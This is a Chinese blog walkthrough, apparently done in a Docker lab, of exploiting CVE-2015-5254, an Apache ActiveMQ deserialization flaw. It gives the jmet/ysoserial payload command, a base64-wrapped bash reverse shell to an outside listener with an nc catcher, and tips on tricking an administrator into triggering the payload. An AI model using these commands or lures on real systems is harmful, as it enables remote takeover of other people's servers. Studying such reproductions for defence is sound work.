首页 > 其他分享 >CVE-2015-5254

CVE-2015-5254

时间:2024-07-28 21:57:05浏览次数:14  
标签:触发 5254 61616 jar 端口 漏洞 2015 CVE ActiveMQ

目录

漏洞描述

Apache ActiveMQ 是由美国 Pachitea (Apache) 软件基金会开发的开源消息中间件,支持 Java 消息服务、集群、Spring 框架等。

影响版本:Apache ActiveMQ 5.13.0之前5.x版本,该程序导致的漏洞并不限制可以在代理中序列化的类。远程攻击者可以利用此漏洞使特殊的序列化 Java 消息服务 (JMS) ObjectMessage 对象执行任意代码。

它将在端口 61616 和 8161 上建立两个端口。端口 61616 是工作端口,消息在此端口上传递。端口 8161 是网页管理页面端口。访问方面,可以看到网络管理页面,但是这个漏洞理论上并不需要网络。

漏洞利用流程如下

1、生成序列化有效负载(可以使用 ysoserial)
2、将有效负载发送到端口 61616
3、访问 Web 管理页面并阅读序列化消息,然后您可以触发漏洞

复现过程

1、扫描IP开放端口信息

nmap -sC -sV 192.168.3.243 -p-

在这里插入图片描述
发现其开放61616端口,运行apachemq ActiveMQ

2、下载jmet(Java 消息利用工具),在同目录下创建external文件夹。(否则可能会出现文件夹不存在的错误)
在这里插入图片描述
3、执行命令,将有效负载发送到目标IP的61616端口

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME 192.168.3.243 61616

在这里插入图片描述
【命令解释】:调用java -jar 运行 jmet的jar包,-Q是插入一个名为event的队列,-I 是选择装载ActiveMQ模块 ,-s 是选择ysoserial payload ,-Y 是攻击模式和内容, -Yp 是选择攻击利用链,这是选择是ROME, 之后带上IP加端口。
-Q 比如我修改event为hack 就成为插入一个名为hack的队列。

4、这时,会给目标ActiveMQ添加一个event列,我们可以通过http://192.168.3.243:8161/admin/queues.jsp;jsessionid=1bz5fbkl1zhbu1g6b2qjtiakd看到这个队列中所有消息:

在这里插入图片描述
点击查看这条消息即可触发命令执行

在这里插入图片描述
在这里插入图片描述
5、登录ActiveMQ容器环境,查看命令已经执行成功,/tmp/sucess文件已成功创建
查看容器id

sudo docker ps -a

在这里插入图片描述
得到ActiveMQ容器id 27ef409aae5d

6、登录容器环境

docker exec -it 27ef409aae5d bash

7、查询tmp目录下的文件

ls -la /tmp/

在这里插入图片描述
8、将命令替换成弹shell的语句再利用

bash -i >& /dev/tcp/192.200.3.242/31005 0>&1

Base64编码
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMjAwLjMuMjQyLzMxMDA1IDA+JjE=
在这里插入图片描述
bash64解码

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMjAwLjMuMjQyLzMxMDA1IDA+JjE=}|{base64,-d}|{bash,-i}

9、kali开启端口监听

nc -lvvp 31005

在这里插入图片描述

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMjAwLjMuMjQyLzMxMDA1IDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.3.243 61616

在这里插入图片描述
记住ID号,后面会用到
kali-34033-1721830306563-0:1
在这里插入图片描述
点一个触发shell
在这里插入图片描述

漏洞利用思路

通过web管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下,我们可以诱导管理员访问我们的链接以触发,或者伪装成其他合法服务需要的消息,等待客户端访问的时候触发

总结

通过 Web 管理页面访问消息并触发漏洞需要管理员权限。在没有密码的情况下,我们可以诱使管理员访问我们的链接触发,或者伪装成其他服务的合法消息在触发时需要等待客户端访问。

标签:触发,5254,61616,jar,端口,漏洞,2015,CVE,ActiveMQ
From: https://blog.csdn.net/m0_53008479/article/details/140621562

相关文章

  • vs2015+Qt环境问题汇总
    1、出现一下莫名奇妙的qt头文件编译报错可能原因是Qt版本太高,建议降低版本,VS2015与Qt5.12.9可以编译通过2、出现无法运行rc.exe错误左边项目资源管理器中右击-->属性-->常规->>目标平台选择8.13、打开.ui界面文件后提示打开错误1、右击ui文件,然后点【添......
  • (BS ISO 11898-1:2015)CAN_FD 总线协议详解5- MAC子层描述3
    目录 创作不易,请帮忙点赞+评论+转载,非常感谢5.4.3MACRF(远程帧)规范5.4.3.1描述5.4.3.2MACDF和MACRF相同的字段5.4.3.3仲裁字段5.4.3.4控制字段5.4.4错误帧(EF)的规范5.4.4.1描述5.4.4.2错误标志5.4.4.3错误分隔符5.4.5过载帧(OF)的规定5.......
  • [RCTF2015]EasySQL 1
    目录题目分析源码分析注入位置正则过滤注入方式注入题目分析这道题目给源码了,但别人貌似都是黑盒做的,不管了,代码审计启动!源码分析注入位置注入的位置在changepwd.php<?phpsession_start();header("Content-Type:text/html;charset=UTF-8");require_on......
  • [题解]P2672 [NOIP2015 普及组] 推销员
    P2672[NOIP2015普及组]推销员为了便于操作,将住户信息按疲劳值从大到小排序。那么对于选\(X\)个住户,有\(2\)种情况:选疲劳值前\(X\)大的住户,答案即为\(\sum\limits_{i=1}^Xa[i]+2\times\max\limits_{i=1}^Xs[i]\)。选疲劳值前\(X-1\)大的住户,然后在剩下的住户中,距离比......
  • (BS ISO 11898-1:2015)CAN_FD 总线协议详解5- MAC子层描述1
    目录5.MAC子层描述5.1总则5.2MAC子层的服务5.2.1服务描述5.2.2服务原语规范5.2.2.1概述5.2.2.2MA_Data.Request5.2.2.3MA_Data.Indication功能MA_Data.Indication 原始的语义收到原始的效果5.2.2.4MA_Data.Confirm功能MA_Data.Confirm 原始的语义5.2.......
  • [ABC363G] Dynamic Scheduling 与 P4511 [CTSC2015] 日程管理
    思路:对于插入操作,设插入\(\{t,p\}\):若当前\(1\simt\)有空位,那么就放进去。否则,\(1\simt\)是被塞满了的:首先容易想到的是找到\(1\simt\)中贡献最小的那个工作,若贡献比\(p\)还小,可以与之替换掉。但是假了,考虑这样一种情况:在\(1\simt\)外有一个更小的......
  • 金币 NOIP2015 普及组 T1
    Hello!我是loveyou的小羊生煎(>-<)通过我分享的实用技巧和策略,你将在你的领域脱颖而出,引领潮流!无论你遇到什么挑战,我将一直在你身边,为你提供支持和鼓励!2话不说上代码说明国王将金币作为工资,发放给忠诚的骑士。第一天,骑士收到一枚金币;之后两天(第二天和第三天),每天收到两枚......
  • P2671 [NOIP2015 普及组] 求和 题解
    题目:P2671NOIP2015普及组求和题意给定一个带有颜色和数字的序列,我们要寻找三元组\((x,y,z)\)满足以下条件:\(y\)为\(x\)和\(z\)的中点且都为整数。\(color[x]=color[z]\)。我们命这样一个三元组对答案的贡献为\((x+z)*(num[x]+num[z])\)。整个序列的总价值为每个......
  • CVE-2018-5767 tenda固件栈溢出漏洞
    路由器固件型号:TendaAC1515.03.1.16_multi固件下载地址:https://drivers.softpedia.com/dyn-postdownload.php/d27e8410d32cd9de63a3506c47ded1bc/61ff85c5/75eb7/4/1binwalk分离binwalk-MeUS-bin漏洞点:在squashfs-root/bin/httpd可以通过readelf-hhttpd来查......
  • 华为路由器漏洞CVE-2017-17215
    固件获取https://github.com/Vu1nT0tal/IoT-vulhub/tree/master/HUAWEI/CVE-2017-17215/firmware提取binwalk-MerHG532eV100R001C01B020_upgrade_packet.bin启动qemu-systemsudoqemu-system-mips-Mmalta-kernelvmlinux-3.2.0-4-4kc-malta-hdadebian_wheezy_mips......